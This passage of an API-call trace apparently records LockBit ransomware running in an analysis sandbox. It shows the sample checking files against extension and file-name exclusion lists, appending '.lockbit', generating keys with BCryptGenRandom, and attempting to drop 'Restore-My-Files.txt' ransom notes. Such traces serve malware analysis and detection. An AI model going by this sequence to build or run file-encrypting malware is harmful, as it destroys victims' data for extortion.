(lpString1=".db-shm", lpString2=".xml") returned -1 [0195.887] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.887] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.887] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.887] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.887] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.887] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.887] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.887] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.887] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.887] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.887] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.887] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.887] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.888] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.888] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.888] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.888] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.888] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.888] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.888] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.888] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.888] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic 2.xml.lockbit") returned 94 [0195.888] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic 2.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\office classic 2.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.890] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.890] malloc (_Size=0x40068) returned 0x3df0008 [0195.890] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3585) returned 1 [0195.890] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.891] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.891] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.892] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.892] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.958] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic 2.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic 2.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.959] malloc (_Size=0xd2) returned 0x1fa2ed8 [0195.959] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xd2, FileInformationClass=0xa) returned 0xc0000008 [0195.959] free (_Block=0x1fa2ed8) [0195.959] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic 2.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.959] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.959] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.959] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefe70d00, ftCreationTime.dwHighDateTime=0x1c9b824, ftLastAccessTime.dwLowDateTime=0x528a9ed0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xefe70d00, ftLastWriteTime.dwHighDateTime=0x1c9b824, nFileSizeHigh=0x0, nFileSizeLow=0xe20, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office Classic.xml", cAlternateFileName="OFFICE~2.XML")) returned 1 [0195.959] lstrcmpiW (lpString1=".", lpString2="Office Classic.xml") returned -1 [0195.959] lstrcmpiW (lpString1="..", lpString2="Office Classic.xml") returned -1 [0195.959] PathFindExtensionW (pszPath="Office Classic.xml") returned=".xml" [0195.959] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.959] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.959] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.959] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.959] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.959] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.959] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.959] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.959] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.959] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.959] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.959] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.960] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.961] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.961] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.961] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.961] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.961] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.961] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.961] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.961] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.961] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Office Classic.xml") returned 1 [0195.961] lstrcmpiW (lpString1="ntldr", lpString2="Office Classic.xml") returned -1 [0195.961] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Office Classic.xml") returned -1 [0195.961] lstrcmpiW (lpString1="bootsect.bak", lpString2="Office Classic.xml") returned -1 [0195.961] lstrcmpiW (lpString1="autorun.inf", lpString2="Office Classic.xml") returned -1 [0195.961] lstrcmpiW (lpString1="thumbs.db", lpString2="Office Classic.xml") returned 1 [0195.961] lstrcmpiW (lpString1="iconcache.db", lpString2="Office Classic.xml") returned -1 [0195.961] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.961] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic.xml") returned=".xml" [0195.961] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.961] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.961] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.961] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.961] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.961] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.961] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.961] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.961] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.961] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.962] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.962] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.962] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.962] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.962] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.962] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.962] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.962] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.962] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.962] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.962] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.962] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.962] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.962] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.962] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.962] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.962] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.962] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.962] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic.xml.lockbit") returned 92 [0195.962] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\office classic.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.964] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.964] malloc (_Size=0x40068) returned 0x3df0008 [0195.964] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3616) returned 1 [0195.964] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.965] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.965] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.965] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.965] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.970] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.970] malloc (_Size=0xce) returned 0x1fa2ed8 [0195.970] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xce, FileInformationClass=0xa) returned 0xc0000008 [0195.970] free (_Block=0x1fa2ed8) [0195.970] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.970] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.970] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.971] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7572900, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x618565f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf7572900, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xe1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Opulent.xml", cAlternateFileName="")) returned 1 [0195.971] lstrcmpiW (lpString1=".", lpString2="Opulent.xml") returned -1 [0195.971] lstrcmpiW (lpString1="..", lpString2="Opulent.xml") returned -1 [0195.971] PathFindExtensionW (pszPath="Opulent.xml") returned=".xml" [0195.971] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.971] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.971] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.971] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.971] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.971] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.971] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.971] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.971] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.971] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.971] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.971] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.971] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.971] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.971] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.971] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.971] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.971] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.971] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.971] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.971] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.972] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Opulent.xml") returned 1 [0195.972] lstrcmpiW (lpString1="ntldr", lpString2="Opulent.xml") returned -1 [0195.973] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Opulent.xml") returned -1 [0195.973] lstrcmpiW (lpString1="bootsect.bak", lpString2="Opulent.xml") returned -1 [0195.973] lstrcmpiW (lpString1="autorun.inf", lpString2="Opulent.xml") returned -1 [0195.973] lstrcmpiW (lpString1="thumbs.db", lpString2="Opulent.xml") returned 1 [0195.973] lstrcmpiW (lpString1="iconcache.db", lpString2="Opulent.xml") returned -1 [0195.973] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.973] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Opulent.xml") returned=".xml" [0195.973] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.973] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.973] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.973] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.973] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.973] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.973] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.973] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.973] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.973] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.973] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.973] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.973] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.973] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.973] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.973] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.973] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.973] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.973] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.974] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.974] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.974] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.974] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.974] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.974] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.974] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.974] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.974] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.974] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Opulent.xml.lockbit") returned 85 [0195.974] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Opulent.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\opulent.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.976] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.976] malloc (_Size=0x40068) returned 0x3df0008 [0195.976] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3613) returned 1 [0195.976] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.976] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.976] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.976] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.977] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.977] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.982] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Opulent.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Opulent.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.982] malloc (_Size=0xc0) returned 0x1fa2ed8 [0195.982] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0xc0000008 [0195.982] free (_Block=0x1fa2ed8) [0195.982] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Opulent.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.982] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.982] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.983] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8885600, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x528a9ed0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf8885600, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xe5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oriel.xml", cAlternateFileName="")) returned 1 [0195.983] lstrcmpiW (lpString1=".", lpString2="Oriel.xml") returned -1 [0195.983] lstrcmpiW (lpString1="..", lpString2="Oriel.xml") returned -1 [0195.983] PathFindExtensionW (pszPath="Oriel.xml") returned=".xml" [0195.983] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.983] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.983] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.983] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.983] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.983] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.983] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.983] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.983] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.983] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.983] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.983] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.983] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.983] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.983] lstrcmpiW (lpString1=".mpa", lpString2=".xml") 